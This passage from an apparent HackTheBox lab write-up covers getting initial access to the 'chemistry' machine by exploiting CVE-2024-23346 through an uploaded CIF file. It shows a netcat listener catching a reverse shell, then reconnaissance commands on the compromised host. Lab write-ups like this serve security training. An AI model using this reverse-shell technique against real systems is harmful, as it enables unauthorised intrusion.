RCE
The target web application, built on Python, appears to be vulnerable to CVE-2024-23346 as it processes CIF files.
Uploaded the modified PoC CIF file and executing it via clicking into the View button
The target web application fetched the reverse shell payload
┌──(kali㉿kali)-[~/archive/htb/labs/chemistry]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.15.34] from (UNKNOWN) [10.129.236.230] 47500
sh: 0: can't access tty; job control turned off
$ whoami
app
$ hostanme
sh: 2: hostanme: not found
$ hostname
chemistry
$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:94:5a:91 brd ff:ff:ff:ff:ff:ff
inet 10.129.236.230/16 brd 10.129.255.255 scope global dynamic eth0
valid_lft 2835sec preferred_lft 2835sec
inet6 dead:beef::250:56ff:fe94:5a91/64 scope global dynamic mngtmpaddr
valid_lft 86398sec preferred_lft 14398sec
inet6 fe80::250:56ff:fe94:5a91/64 scope link
valid_lft forever preferred_lft foreverInitial Foothold established to the target system as the app account by exploiting CVE-2024-23346